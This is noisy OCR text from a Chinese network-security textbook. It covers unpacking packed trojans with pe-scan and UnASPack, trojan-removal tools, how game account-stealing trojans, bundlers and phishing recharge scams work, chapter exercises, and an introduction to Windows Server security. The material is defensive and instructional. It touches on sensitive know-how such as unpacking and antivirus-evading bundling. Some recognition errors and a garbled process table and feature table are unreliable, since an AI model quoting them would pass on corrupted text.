@ 用 户 指定 节 名 (小 于 6 个 字符 ); nsp 〇 少 除 所 有 节 名 


语言 ; 中 文 本 














看 打开 中 


图 4-12 NSPack 选项 设置 
技术 ,给 脱 壳 、 汉 化 \ 破 解 带 来 了 极 大 的 便利 。pe-scan 还 可 检测 出 一 些 壳 的 入 口 点 (OEP)， 
方便 手动 脱 壳 ,对 加 壳 软 件 的 识别 能 力 完全 超过 FileInfo 和 PE iDentifier, 能 识别 出 绝 大 多 
数 过 的 类 型 。 另 外 ,pe-scan 还 具备 高 级 扫描 器 ,具备 重建 脱 壳 后 文件 的 资源 表 功 能 。 


具体 操作 步骤 如 下 。 


(1) 运行 pe-scan, 单 击 “ 选 项 ”按钮 。 设 置 相关 选项 ,如 图 4-13 所 示 。 
(2) 返回 主 界面 , 单 击 “ 打 开 ” 按 钮 。 选 择 并 打开 要 分 析 的 文件 。 
(3) 在 主 界面 中 , 单 击 “信息 ”按钮 ,可 查看 文件 加 壳 信息 。 单 击 * 入 口 点 ”按钮 ,也 可 以 


查看 入 口 点 \ 偏 移 量 等 信息 ,如 图 4-14 所 示 。 
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4-13 ”pe-scan 选项 设置 
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图 4-14 ”pe-scan 查看 加 这 信息 


(4) 参看 图 4-15, 单 击 “ 高 级 扫描 "按钮 。 单 击 “ 启 发 特征 ”下 的 “入 口 点 ”按钮 ,可 查看 最 
接近 的 匹配 信息 。 单 击 “ 链 特征 ?下 的 “入口 点 ”按钮 ,可 查看 最 长 的 链 等 信息 。 如 图 4-16 


所 示 。 
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图 4-15 pe-scan 查看 人 口 点 信息 图 4-16 pe-scan 查看 最 长 的 链 信息 

















14. 使 用 UnASPack 进行 脱 壳 


在 查 出 木马 的 加 壳 程 序 之 后 ,就 需要 找到 原 加 壳 程 序 进行 脱 壳 , 上 述 木 马 使 用 ASPack 
进行 加 壳 , 所 以 需要 使 用 ASPack 的 脱 壳 工 具 UnASPack 进行 脱 壳 。 具 体操 作 步 又 如 下 。 

(1) 下 载 UnASPack 并 解压 ,解压 后 直接 运行 。 

(2) 选择 并 打开 要 脱 壳 的 文件 , 单 击 * 脱 壳 ?” 按 钮 。 脱 壳 不 成 功 时 会 报错 。 

(3) 使 用 UnASPack 进行 脱 壳 时 要 注意 ,UnASPack 的 版 本 要 与 加 壳 时 的 ASPack 的 版 
本 一 致 ,才能 够 成 功 为 木马 脱 壳 。 


j> 4.5.4 木马 清除 软件 


如 果 不 了 解 发 现 的 木马 病毒 ,要 想 确定 木马 的 名 称 、 入 侵 端 口 、 隐 藏 位 置 和 清除 方法 等 
都 非常 困难 ,这 时 就 需要 使 用 木马 清除 软件 清除 木马 。 


有 1. 用 木马 清除 专家 清除 木马 


木马 清除 专家 2017 是 专业 防 杀 木马 软件 ,针对 目前 流行 的 木马 病毒 特别 有 效 ,彻底 查 
杀 各 种 流行 QQ 盗号 木马 、 网 游 盗 号 木马 、 冲击波、 灰 铝 子 . 黑 客 后 门 等 上 万 种 木马 间谍 程 
序 。 软 件 除 采 用 传统 病毒 库 查 杀 木 马 外 ,还 能 智能 查 杀 未 知 变种 木马 ,自动 监控 内 存 可 疑 程 
序 , 实 时 查 杀 内 存 硬 盘 木 马 ,采用 第 二 代 木 马 扫 描 内 核 , 查 杀 木 马 快 速 。 软 件 本 身 还 集成 了 
内 存 优化 IE 修复 、 恶 意 网 站 拦截 、 系 统 文件 修复 .硬盘 扫描 功能 和 系统 进程 管理 和 启动 项 
目 管理 等 。 

具体 操作 步骤 如 下 。 

(1) 运行 木马 清除 专家 2017 免费 版 , 单 击 系统 监控 模块 的 “扫描 内 存 按 钮 ,可 以 开始 
查 杀 正在 运行 的 木马 ,如 图 4-17 所 示 。 

(2) 扫描 完成 后 ,可 直接 在 右 侧 查看 扫描 结果 。 单 击 “ 扫 描 硬 盘 ” 按 钮 ,可 进行 “快速 扫 
描 、 全 面 扫描 和 自 定义 扫描 ”三 种 扫描 方式 。 

(3) 如 图 4-17 所 示 ,可 单 击 “系统 信息 ”按钮 ,查看 CPU 占用 率 以 及 内 存 使 用 情况 等 。 

(4) 在 系统 管理 模块 中 ,查看 进程 和 启动 项 等 。 在 高 级 功能 模块 中 ,可 进行 ARP 绑 定 、 
修复 系统 等 操作 。 
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图 4-17 木马 清除 专家 运行 界面 


(5) 在 其 他 功能 模块 中 , 单 击 * 网 络 状态 ”按钮 ,可 查看 进程 .端口 .远程 地 址 .状态 等 信 
息 ; 单 击 “ 辅 助 工具 ”按钮 ,可 粉碎 无 法 删除 的 木马 等 ,如 图 4-18 所 示 。 
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图 4-18 木马 清除 专家 其 他 辅助 工具 界面 
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(6) 在 图 4-18 中 的 “监控 日 志 ?选项 也 要 定期 查看 ,查找 黑客 人 侵 的 痕迹 。 


12. 在 “Windows 进程 管理 器 ”中 管理 进程 


所 谓 进程 是 指 系统 中 应 用 程序 的 运行 实例 ,是 应 用 程序 的 一 次 动态 执行 ,是 操作 系统 当 
前 运行 的 执行 程序 。 通 常 按 Ctrl 十 Alt 十 Delete 组 合 键 ,选择 “启动 任务 管理 器 ”选项 即 可 打 
开 “Windows 任务 管理 器 "窗口 。 在 “进程 ”选项 卡 中 可 对 进程 进行 查看 和 管理 。 

要 想 更 全 面 地 对 进程 进行 管理 ,还 需要 借助 于 “Windows 进程 管理 器 ”才能 实现 ,具体 操 
作 步 又 如 下 。 

(1) 解压 缩 下 载 的 “Windows 进程 管理 器 ”, 启 动 软件 。 

(2) 选择 列表 中 的 某 个 进程 项 , 单 击 “ 描 述 ” 按 钮 ,就 可 以 查看 进程 的 相关 信息 ,如 
图 4-19 所 示 。 

















































固 自动 屏蔽 危险 进程 站 开机 自动 运行 站 窗口 吐 页 
二 纹 B 全 4 下 昌 亲 [ar | ry 
System Idle Process SYSTEN 0 Systen Tdle Process [a | 
Systen SISTEN 4 0 Wg: 读 | <^ 
Smss. exe SYSTEN 304 00 1,220 标 1g 侍 汪 
srss. exe SYSTEN 428 00 5,848 。 标 ; 人 : 款 示 可 胜 
SYSTEN 484 00 5,616 高 拭 多 ， 洒 刚 表示 CPV 
SYSTEN 504 0o0 70,456 标 
SYSTEN 54 00 11,644 。 标 站 
lsass. exe SISTEN 578 00 19,376 。 标 站 
lsn. exe SYSTEN 5s84 00 4592 标 站 
winlogon. exe SYSTEN 660 00 8,276 高 
Svchost exe SYSTE T24 00 10,312 标 站 
ibapnsve. exe SYSTEN Te 00 4,.504 标 闪 
svehost. exe NETWORK SERVICE 836 00 10,832 标 站 
svehost, exe IDCAL SERVICE 924 oo 21,624 标准 
Svchost exe SISTEN 972 om 19,916 标 站 
Svchost_ exe LOCAL SERVICE 1004 oo0 20,364 标 站 
Svchost exe SYSTEN 324 0 44,132 标 有 有 
audiodg. exe IDCAL SERVICE 344 00 
TrustedTnstaller .， SISTEN 1H6 0 39,296 。 标 站 
WUDFHost exe IDCAL SERVICE 1132 oo 5,832 标 交 
国 -hudongfangru exe srsTEn 1200 0o0 18,732 ” 标 将 
Svehost. exe NETWORK SERVICE 1248 00 18,244 标 站 
spoolsr exe SYSTEN 1452 00 14,650 标 闪 — 
svehost. exe IDCAL SERVICE 1520 ”00 20,608 。 标 淹 = 
| y 


























图 4-19 查看 进程 的 相关 信息 


(3) 单 击 * 模 块 按 钮 ,就 可 查看 该 进程 的 进程 模块 。 
(4) 右 击 某 进 程 选 项 ,从 快捷 菜单 中 可 以 进行 “查看 属性 ”等 一 系列 命令 。 
(5) 在 “系统 信息 ?选项 卡 中 可 查看 系统 的 有 关 信息 ,并 监视 内 存 和 CPU 的 使 用 情况 。 


PP 4.5.5 网 游 盗 号 木马 
由 于 网 吧 是 面向 社会 公众 开放 的 营利 性 网 络 服务 场所 ,用 户 可 利用 网 吧 进 行 网 页 浏览 、 
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网 游 聊 天 、 听 音乐 或 其 他 活动 。 针 对 网 吧 的 这 一 特点 ,一些 黑客 在 网 吧 中 植 入 木马 ,以 等 待 
并 窃取 下 一 位 使 用 该 计算 机 的 用 户 账号 和 密码 等 信息 。 

某 些 网 游资 号 木马 可 以 盗 取 多 款 网 络 游戏 的 账号 密码 信息 ,这 类 病毒 文件 运行 后 会 衍 
生 相关 文件 至 系统 目录 下 ,并 修改 注册 表 和 生成 启动 项 ,通过 注 和 人 进程 可 以 设置 消息 监视 ， 
截获 用 户 的 账号 资料 并 发 送 到 木马 种 植 者 指定 的 位 置 ,更 有 一 些 盗号 木马 会 把 游戏 账号 里 
的 装备 信息 记录 下 来 一 起 发 送 给 木马 种 植 者 。 


有 1. 了解 舞 绑 盗 号 木马 


在 网 络 游戏 中 ,一些 游戏 外 挂 ` 游 戏 插件 和 游戏 客户 端 软件 多 被 盗号 木马 捆绑 在 一 起 。 
使 用 这 些 程序 的 人 多 数 是 玩 网 络 游戏 的 人 ,因此 盗 取 网 络 游戏 的 账号 和 密码 信息 最 便利 的 
途径 就 是 在 这 些 程序 中 拥 绑 盗号 木马 。 图 片 和 Flash 文件 也 经 常 被 拥 绑 木 马 ,因为 图 片 和 
Flash 文件 不 需要 用 户 另 外 执行 ,只 要 打开 就 可 以 运行 ,一 旦 用 户 浏 览 了 拥 绑 了 木马 的 图 片 
和 Flash 文件 ,系统 就 会 中 毒 。 网 络 上 存在 有 很 多 拥 绑 工具 ,如 永 不 查 杀 的 拥 绑 机 。 

“ 永 不 查 杀 的 拥 绑 机 ?除了 支持 常见 的 图 标 图 片 文 件 (. ico、. bmp) 外 ,还 支持 从 可 执行 文 
件 (. exe) 和 动态 链接 库 (. dll) 中 提取 相关 的 图 标 。 由 于 该 工具 是 利用 模拟 IE 程序 来 支持 多 
个 不 同类 型 的 文件 搁 绑 成 一 个 可 执行 程序 ,因此 一 般 的 杀毒 工具 都 不 会 报警 ,从 而 躲 开 了 和 杀 
毒 软件 的 查 杀 。 





有 2. 哪些 网 游 账号 容易 被 次 


目前 网 络 游戏 已 经 成 为 很 多 人 的 另 一 个 世界 ,网 络 游戏 中 的 很 多 装备 甚至 级 别 高 的 账 
号 本 身 也 成 为 玩家 的 财产 ,在 现实 世界 中 也 可 以 用 现金 来 进行 交易 。 于 是 ,一 些 不 法 之 徒 开 
始 盯 上 网 络 游戏 ,通过 资 取 网 络 游戏 的 账号 来 牟取 不 当 之 财 。 

以 下 几 种 网 络 游戏 账号 最 容易 被 盗 。 

(1) 有 价值 的 账号 。 账 号 的 等 级 越 高 或 网 络 游戏 中 的 人 物 装备 越 好 ,其 价值 就 越 高 。 
如 果 是 新 申请 的 账号 ,即使 账号 被 盗 , 玩 家 也 不 会 在 意 。 

(2) 在 网 吧 或 公共 场合 玩 网 络 游戏 的 账号 。 由 于 这 种 场合 的 计算 机 谁 都 能 用 ,这 直接 
为 盗号 者 提供 了 方便 。 

(3) 网 游 账 号 公用 。 很 多 玩 网 游 的 人 喜欢 几 个 人 共用 一 个 号 ,因为 这 样 升级 比较 快 ,但 
是 这 样 就 增加 了 账号 被 盗 的 可 能 性 ,只 要 这 些 人 中 有 一 个 人 的 机 器 中 了 盗号 木马 ,游戏 账号 
就 很 有 可 能 被 盗 。 

目前 常见 的 网 游 盗号 木马 有 以 下 几 种 。 

(1) NRD 系列 网 游 窃贼 。NRD 系列 网 游 穷 贼 是 一 款 典 型 的 网 游 盗号 木马 ,通过 各 种 木 
马 下 载 器 进入 用 户 计 算 机 ,利用 键盘 钩子 等 技术 盗 取 * 地 下 城 与 勇士 ”魔兽 世界 “传奇 世 
界 ? 等 多 款 热门 网 游 的 账号 和 密码 ,还 可 对 受害 用 户 的 计算 机 进行 屏幕 截图 .窃取 用 户 存 储 
在 计算 机 上 的 图 片 文档 和 文本 文档 ,以 此 破解 游戏 密 保 卡 , 并 将 这 些 敏感 信息 发 送 到 指定 邮 
箱 中 。 

(2) 魔兽 密 保 克 星 。 该 盗号 木马 是 将 自己 伪装 为 游戏 ,针对 热门 网 游 “魔兽 世界 ”游戏 。 
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该 游戏 会 把 正常 的 wow. exe 改名 后 设置 为 隐藏 文件 ,木马 却 以 wow. exe 名 称 出 现在 玩家 
面前 。 如 果 玩 家 不 小 心 运行 了 木马 ,即使 账号 绑 定 了 密码 保护 卡 ,游戏 账号 也 会 被 盗 取 。 
(3) 密 保 卡 盗窃 器 。“ 密 保 卡 盗窃 器 "是 一 款 针对 网 游 密 保 卡 的 盗号 木马 。 它 会 尝试 搜 
寻 并 盗 取 用 户 存放 于 计算 机 中 的 网 游 密 保 卡 .一旦 成 功 ,将 最 终 导 致 游戏 账号 被 盗 。 
(4) 下 载 狗 变种 。“ 下 载 狗 变种 是 一 个 木马 下 载 器 。 利 用 该 工具 可 以 下 载 一 些 网 游资 
号 木马 和 广告 程序 ,从 而 给 用 户 造成 虚拟 财产 的 损失 以 及 频繁 的 弹 窗 骚 扰 。 


1a. 网 站 充值 欺骗 


在 玩 网 络 游戏 过 程 中 ,有 的 玩家 需要 用 金钱 购买 更 精良 的 装备 ,这 时 就 需要 在 相应 充值 
功能 区 使 用 现实 金钱 换取 游戏 中 的 点 数 。 针 对 这 种 情况 ,一 些 黑客 就 模拟 游戏 厂商 界面 或 
在 游戏 界面 中 添加 一 些 具 有 诱惑 性 的 广告 信息 ,以 诱惑 用 户 前 往 充值 ,从 而 骗取 钱财 。 

游戏 网 站 充值 欺骗 术 的 原理 和 骗取 网 上 银行 账号 及 密码 信息 的 原理 相似 ,都 是 使 用 钓 
鱼网 站 虚假 广 告 等 欺骗 手段 。 比 如 ,前段 时 间 出 现 的 非法 网 站 http://www. pay163. com 
和 真实 的 网 易 点 数 卡 充值 查询 中 心 的 网 址 http://pay. 163. com, 不 细心 的 玩家 很 容易 上 当 
受骗 。 

还 有 一 些 黑客 伪造 网 游 的 官方 网 站 , 且 各 个 链接 也 都 能 链接 到 正确 的 网 页 中 ,但 是 会 在 
主页 中 添加 一 些 虚假 的 有 奖 信 息 ,提示 玩家 已 经 中 了 大 奖 , 让 玩家 通过 登录 网 址 了 解 相关 的 
具体 细节 以 及 领取 方式 。 待 玩家 打开 相应 网 址 后 ,会 提示 输入 填写 账号 、 密 码 .角色 等 级 等 
信息 ,一旦 输入 这 些 资料 ,玩家 的 账号 信息 就 已 经 被 黑客 盗 取 ,然后 其 直接 登录 该 账号 ,并 转 
移 此 账号 中 的 贵重 物品 。 

网 络 骗术 层出不穷 ,让 人 防不胜防 ,尤其 是 在 网 络 游戏 中 ,一 不 小 心 就 掉 入 了 盗号 者 布 
下 的 陷阱 。 所 以 不 要 轻信 任何 非 官 方 网 站 的 表单 提交 程序 ,一 定 要 通过 正确 的 方式 进入 网 
游 公司 的 正式 页 面 才能 确保 账号 安全 。 黑 客 常用 的 欺骗 方式 有 如 下 几 种 。 

1) 冒充 系统 管理 员 或 工作 人 员 骗 取 账 号 密码 

这 种 方法 比较 常见 ,盗号 者 一 般 申请 “网 易 发 奖 员 “点 卡 验证 员 ” 等 名 字 , 然 后 发 送 一 些 
虚假 的 中 奖 信息 。 针 对 这 种 情况 ,可 以 采取 如 下 几 种 防范 措施 。 

(1) 一 般 在 游戏 中 只 有 一 个 “游戏 管理 员 ”, 其 他 任何 管理 员 都 是 假冒 的 ,而 且 “ 游 戏 管 
理 员 ”在 游戏 中 一 般 是 不 会 向 用 户 索 取 账 号 和 密码 的 。 

(2) 如 果 * 游 戏 管理 员 ” 有 必要 索取 用 户 的 账号 、 密 码 进行 查询 ,也 只 会 让 用 户 通 过 客服 
专区 或 邮件 的 形式 提交 。 

(3) 游戏 官方 只 会 在 主页 上 以 公告 的 形式 向 用 户 公布 任何 与 中 奖 有 关 的 信息 ,而 不 会 
在 游戏 中 。 

(4) 如 果 在 游戏 的 过 程 中 发 现 有 人 发 送 类 似 骗取 账号 和 密码 的 信息 ,可 以 马上 向 在 线 
的 “游戏 管理 员 ? 报 告 ,或 者 通过 客服 专区 提交 。 

2) 利用 账号 买卖 等 形式 骗取 账号 和 密码 

这 种 方法 是 利用 虚假 的 交易 账号 来 骗取 玩家 的 账号 。 盗 号 者 通常 以 卖 号 为 名 ,把 号 卖 
给 用 户 , 但 是 在 得 到 钱 后 又 通过 安全 码 找 回 去 ; 或 假装 想 购 买 用 户 的 账号 ,以 看 号 为 名 骗取 
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账号 。 其 防范 方法 如 下 。 

(1) 拒绝 虚拟 财产 交易 ,尤其 是 拒绝 账号 交易 。 

(2) 不 要 将 自己 的 账号 ,安全 码 或 密码 轻易 告诉 其 他 玩家 。 

3) 发 送 虚 假 修改 安全 码 信 息 欺 骗 用 户 

盗号 者 通常 会 通过 游戏 频道 向 他 人 发 送 类 似 “ 告 诉 大 家 一 个 好 消息 ,网 易 账 号 系统 已 经 
被 破解 了 ,可 以 通过 登录 http://xy2on x*x . xxxx .com 页 面 修改 安全 码 1” 的 通知 。 用 户 一 
且 登 录 该 页 面 并 输入 自己 的 账号 和 密码 等 信息 ,该 用 户 的 这 些 信息 就 会 被 盗号 者 窃取 。 

该 种 欺骗 方式 的 防范 方法 如 下 。 

(1) 不 要 轻信 这 些 信息 。 

(2) 如 果 要 修改 安全 码 , 则 一 定 要 到 游戏 开发 公司 的 官方 网 站 上 修改 。 

4) 冒充 朋友 ,在 游戏 中 索要 用 户 账号 、 点 卡 等 信息 

该 种 盗号 方式 的 特点 是 盗号 者 自称 是 游戏 中 用 户 的 朋友 或 某 朋友 的 “小 号 ”, 然 后 便 称 
想 要 看 用 户 的 “极品 "装备 ,或 帮 用 户 练 级 、 充 值 点 卡 等 ,从 而 向 其 索要 账号 、 密 码 。 而 当 用 户 
将 账号 、 密 码 发 给 对 方 后 ,其 账号 就 会 立刻 被 下 线 , 当 再 次 尝试 登录 时 将 会 被 提示 密码 错误 。 
其 防范 方法 是 不 要 轻易 将 自己 的 游戏 账号 和 密码 告诉 他 人 。 
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选择 题 
(1) 在 计算 机 病毒 发 展 过 程 中 ， 给 计算 机 病毒 带 来 了 第 一 次 流行 高 峰 ,同时 病 
毒 具 有 了 自我 保护 的 功能 。 
A. 多 态 性 病毒 阶段 B. 网 络 病毒 阶段 
C. 混合 型 病毒 阶段 D. 主动 攻击 型 病毒 
(2) 是 一 种 更 具 破 坏 力 的 恶意 代码 ,能 够 感染 多 种 计算 机 系统 ,其 传播 之 快 、 
影响 范围 之 广 、 破 坏 力 之 强 都 是 空前 的 。 
A. 特洛伊 木马 B. CIH 病毒 
CCoDeReDII 双 型 病毒 D. 蠕虫 病毒 
(3) 按照 计算 机 病毒 的 链接 方式 不 同 分 类 ， 是 将 其 自身 包围 在 合法 的 主 程序 
的 四 周 ,对 原来 的 程序 不 做 修改 。 
A. 源码 型 病毒 B. 外 壳 型 病毒 
C. 嵌入 型 病毒 D. 操作 系统 型 病毒 
(4) 属于 蠕虫 病毒 ,由 Delphi 工具 编写 .能 够 终止 大 量 的 防 病毒 软件 和 防火 墙 
软件 进程 。 
A. 熊猫 烧香 B .机 器 狗 病毒 
C. AV 杀手 D. 代理 木马 
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中 2. 填空 题 

(1) 计算 机 病毒 是 在 中 插入 的 破坏 计算 机 功能 的 数据 ,影响 计算 机 使 用 并 且 
能 够 的 一 组 计算 机 指令 或 者 

(2) 病毒 基本 采用 法 来 进行 命名 。 病 毒 前 缀 表示。 ,病毒 名 表示 

,病毒 后 级 表示 5 

(3) 计算 机 病毒 按 传播 方式 分 为 网 和 

(4) 8 是 计算 机 病毒 的 基本 特征 。 使 病 
毒 得 以 传播 ， 体现 病毒 的 杀伤 能 力 ， 是 病毒 的 攻击 性 的 潜伏 性 之 间 的 调整 
杠杆 。 

ls. 简 答 题 

(1) 计算 机 中 毒 的 异常 表现 有 哪些 ? 

(2) 如 何 清除 计算 机 病毒 ? 

4. 操作 题 


(1) 下 载 360 安全 卫士 及 杀毒 软件 ,进行 安装 .设置 . 查 毒 .杀毒 操作 。 
(2) 通过 网 络 查询 一 种 最 新 的 病毒 预防 通告 ,查看 其 特征 、 危 害 和 预防 方法 。 


Windows 操 作 系 统 安 全 





本 章 在 对 Windows 操作 系统 的 模型 与 安全 机 制 进行 概括 性 介绍 的 基础 上 ,进一步 介绍 
系统 的 账户 管理 、 系 统 进程 .服务 管理 和 系统 日 志 的 日 常 维护 。 另 外 ,本 章 还 介绍 与 系统 相 
关 的 一 些 安全 工具 的 使 用 。 


多 > 知识 点 


(1) Windows Server 的 安全 机 制 与 安全 认证 过 程 。 
(2) Windows 账户 管理 及 账户 审计 工具 。 

(3) Windows 的 注册 表 原 理 与 结构 。 

(4) 常用 系统 进程 和 服务 。 

(5) 系统 日 志 。 

(6) 系统 安全 模板 。 

(7) 系统 加 固 。 

(8) 系统 日 常 维护 步骤 。 


局 司 教 学 B 标 


(1) 熟练 使 用 Windows 平台 下 的 各 种 应 用 。 

(2) 能 根据 实际 情况 进行 操作 系统 安全 配置 。 

(3) 掌握 Windows 操作 系统 的 账户 管理 ,注册 表 管理 等 系统 内 置 管理 工具 。 
(4) 熟练 使 用 LC5 .Cain 等 常用 安全 工具 。 

(5) 了 解 操作 系统 攻击 防御 和 加 固 的 工作 机 制 。 

(6) 掌握 使 用 系统 的 日 志 、 审 计 等 系统 管理 方法 。 

(7) 掌握 安全 模板 的 使 用 ,会 分 析 系 统 的 安全 性 。 
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5.1 Windows Server 概述 


随 着 计算 机 网 络 技术 的 快速 发 展 和 广泛 应 用 ,网 络 操作 系统 及 网 站 安全 的 重要 性 更 加 
突出 。 操 作 系统 是 网 络 系统 资源 统一 管理 控制 的 核心 ,是 实现 计算 机 和 网 络 功能 和 服务 的 
重要 基础 。 操 作 系统 和 网 站 提供 各 种 服务 的 安全 性 是 网 络 安全 的 重要 内 容 , 其 安全 性 主要 
体现 在 操作 系统 和 站 点 提供 的 安全 功能 和 服务 ,并 且 针 对 各 种 常用 的 操作 系统 及 站 点 ,可 以 
采取 各 种 相应 的 安全 措施 。 

【案例 5-1】 中 国 自主 研发 操作 系统 保障 网 络 安全 。2014 年 中 国 科学 院 软件 研究 所 与 
上 海 联 彤 网 络 通讯 技术 有 限 公司 开始 联合 ,研发 具有 自主 知识 产权 的 操作 系统 COSCChina 
Operating System) 。 主 要 是 打破 国外 在 基础 软件 领域 的 垄断 地 位 ,引领 并 开发 具有 中 国 自 
主 知识 产权 和 中 国 特色 的 操作 系统 ,可 以 从 根本 上 解决 网 络 安全 问题 。 


j> 5.1.1 Windows 系统 简介 


自 微软 公司 在 1993 年 推出 了 Windows NT 3. 1 后 ,相继 又 推出 了 Windows NT 3.5 和 
Windows NT 4.0, 它 们 以 性 能 强 方便 管理 的 突出 优势 很 快 被 很 多 用 户 所 接受 。Windows 
2000 是 微软 公司 在 Windows NT 之 后 推出 的 网 络 操作 系统 ,其 应 用 .界面 和 安全 性 都 做 了 
很 大 的 改进 ,使 Windows 操作 系统 的 发 展 发 生 了 巨大 的 革新 和 飞跃 。 

Windows Server 2003 是 微软 公司 发 布 的 一 款 应 用 于 网 络 和 服务 器 的 操作 系统 。 该 操 
作 系 统 延 续 微软 的 经 典 视窗 界面 ,同时 作为 网 络 操作 系统 或 服务 器 操作 系统 ,力求 具有 高 性 
能 、 高 可 靠 性 和 高 安全 性 等 必 备 要 素 。 

Windows Server 2008 是 具有 先进 的 网 络 、 应 用 程序 和 Web 服务 功能 的 服务 器 操作 系 
统 , 能 为 用 户 提供 高 度 安全 的 网 络 基 础 架构 ,具有 超 高 的 技术 效率 与 应 用 价值 。 

Windows Server 2012( 开 发 代号 : Windows Server 8) 是 微软 的 一 个 服务 器 系统 ,这 是 
Windows 8 的 服务 器 版 本 ,并 且 是 Windows Server 2008 R2 的 继任 者 ,其 包括 四 个 版 本 。 
Foundation、Essentials、Standard 和 Datacenter 的 主要 区 别 , 如 表 5-1 所 示 。 


表 5-1 Windows Server 2012 各 版 本 对 比 表 




















项 目 Foundation Essentials Standard Datacenter 
授权 方式 仅 限 OEM OEM、 零 售 VOL OEM. 零 售 \VOL a 
处 理 器 上 限 1 2 64 64 
授权 用 户 限制 15 25 无 限 无 限 

1 个 独立 DFS 根 |1 个 独立 DFS 根 

文件 服务 限制 目录 目录 无 限 无 限 
网 络 策略 和 访问 | 50 个 RRAS 连接 及 | RRAS 连接 、IAS 连 无 限 无 限 
控制 1 个 IAS 连接 级 及 服务 组 
远程 桌面 服务 限制 20 个 连接 250 个 连接 无 限 无 限 
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续 表 
项 目 Foundation Essentials Standard Datacenter 
虚拟 机 或 服务 器 不 
虚拟 化 无 能 同时 用 2 个 虚拟 机 无 限 
DHCP 角色 有 有 有 有 
DNS 服务 器 角色 有 有 有 有 
传真 服务 器 角色 有 有 有 有 
UDDI 服务 有 有 有 有 
文档 和 打印 服务 器 ”| 有 有 有 有 
Web 服务 器 (IIS) 有 有 有 有 
Windows 部 署 服 务 | 有 有 有 有 
Windows 服务 器 更 
新 服务 有 有 有 有 
Active Directory 
轻型 目录 服务 有 和 和 加 
Active Directory 
权限 管理 服务 因 而 M 
应 用 程序 服务 器 
角色 有 有 有 有 
服务 器 管理 器 有 有 有 有 
Windows PowerShell | 有 有 有 有 
Active Directory 
域 服务 有 限制 有 限制 有 有 
Active Directory 
证 书 服务 只 作为 颁发 机 构 只 作为 颁发 机 构 有 有 
Active Directory 
联合 服务 有 无 有 有 
服务 器 核心 模式 无 无 有 有 
Hyper-V 无 无 有 有 














作为 网 络 操作 系统 或 服务 器 操作 系统 ,高 性 能 、 高 可 靠 性 和 高 安全 性 是 其 必 备 要 素 , 尤 
其 是 应 用 日 趋 复杂 以 及 Internet 的 应 用 ,对 其 提出 了 更 高 的 要 求 。 

2015 年 5 月 微软 发 布 了 Windows Server 2016 的 第 二 个 技术 预览 版 ,之 后 陆续 发 布 了 
Windows Server 容器 和 Hyper-V 容器 技术 。 内 置 的 容器 技术 显著 影响 所 有 Windows 
Server 版 本 的 架构 ,其 紧密 关注 云 基础 设施 和 云 应 用 程序 ,并 构建 了 更 多 不 同 的 和 更 复杂 的 
组 件 或 功能 。 此 外 ,Windows Server 2016 的 其 他 新 功能 包括 支持 HyperV 滚动 升级 和 存 
储 集群 与 复制 功能 ,其 中 存储 集群 可 令 虚 拟 机 在 计算 集群 结构 失败 的 情况 下 更 好 地 继续 工 
作 , 所 支持 的 存储 复制 功能 ,可 为 备份 和 灾难 恢复 同步 存储 副本 。 

在 仅 考虑 安全 的 前 提 下 ,应 该 是 版 本 越 高 的 操作 系统 越 安 全 。 为 了 考虑 到 实验 室 的 硬 
件 许可 ,以 下 环境 以 Windows Server 2008 为 例 。 


@— 
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了 5.1.2 Windows Server 的 模型 


了 解 一 个 操作 系统 的 体系 结构 就 如 同 了 解 一 辆 汽车 的 结构 一 样 ,不 清楚 汽车 的 结构 也 
一 样 能 驾驶 汽车 ,但 是 如 果 知 道 了 汽车 的 结构 ,在 使 用 汽车 时 就 会 更 好 地 保养 汽车 ,减少 汽 
车 维修 ,甚至 可 以 自己 对 汽车 进行 维修 。 操 作 系 统 系统 结构 比 汽车 复杂 得 多 ,需要 用 户 了 解 
核心 部 件 ,文件 系统 和 操作 系统 怎样 调度 CPU\ 内 存 等 ,从 而 可 以 更 好 地 管理 和 使 用 操作 系统 。 

Windows Server 操作 系统 的 体系 结构 都 是 基于 模块 化 的 组 件 的 系统 。 系 统 中 的 所 有 
组 件 和 对 象 都 提供 接口 ,以 便于 其 他 对 象 进行 交互 ,从 而 利用 这 些 组 件 所 提供 的 各 种 功能 和 
服务 。 这 些 组 件 协同 工作 便 能 执行 特定 的 操作 系统 任务 。 系 统 体系 结构 如 图 5-1 所 示 。 
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图 5-1 Windows 系统 体系 结构 


要 了 解 Windows Server 的 模型 ,就 要 掌握 Windows 系统 的 4 个 重要 概念 : 进程 .线程 、 
虚拟 内 存 、 内 核 模式 和 用 户 模式 。 


外 1. 进程 


尽管 表面 上 看 起 来 程序 和 进程 非常 类 似 .但 本 质 上 它们 却 是 截然 不 同 的 。 程 序 是 一 个 
静态 的 指令 序列 ,而 进程 则 是 一 个 容器 ,其 中 包含 了 当 执 行 一 个 程序 的 特定 实例 时 所 用 到 的 
各 种 资源 。 比 如 Notepad 是 一 个 程序 ,运行 这 个 程序 便 产 生 了 进程 。 

从 高 层次 的 抽象 来 看 ,一 个 Windows 进程 是 由 以 下 元 素 构成 的 。 

(1) 一 个 私有 的 虚拟 地 址 空间 (虚拟 地 址 空间 指 的 是 一 组 虚拟 内 存 地 址 的 范围 ) 。 
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(2) 一 个 可 以 执行 的 程序 。 它 定义 了 初始 的 代码 和 数据 ,并 且 被 映射 到 该 进程 的 虚拟 
地 址 空间 。 

(3) 一 个 已 打开 句柄 的 列表 ,这 些 句柄 指向 各 种 系统 资源 。 该 进程 内 的 所 有 线程 都 可 
以 访问 。 

(4) 一 个 被 称 为 访问 令 牌 的 安全 环境 , 它 标 识 了 与 该 进程 关联 的 用 户 ,安全 组 和 特权 。 

(5) 一 个 被 称 为 进程 ID 的 唯一 标识 符 。 

(6) 至 少 一 个 执行 线程 。( 第 一 个 执行 线程 称 为 主线 程 。) 


12. 线程 


线程 是 一 个 进程 内 部 的 实体 ,也 是 Windows 执行 此 进程 时 的 调度 实体 ( 抛 开 与 进程 的 
关系 ,线程 是 系统 进行 调度 的 单位 )。 如 果 没 有 线程 ,进程 的 程序 不 可 能 运行 。 

线程 包括 以 下 一 些 最 基本 的 部 件 。 

(1) 一 组 代表 处 理 器 状态 的 CPU 寄存 器 中 的 内 容 的 备份 。 

(2) 两 个 栈 , 一 个 用 于 当 线 程 在 内 核 模式 下 执行 时 , 另 一 个 用 于 在 用 户 模式 下 执行 时 。 
可 想 而 知 , 一 个 叫 内 核 模 式 栈 , 另 一 个 叫 用 户 模式 栈 。 

(3) 线程 还 包括 一 个 被 称 为 线程 局 部 存储 区 (TLS) 的 私有 存储 区 域 。 

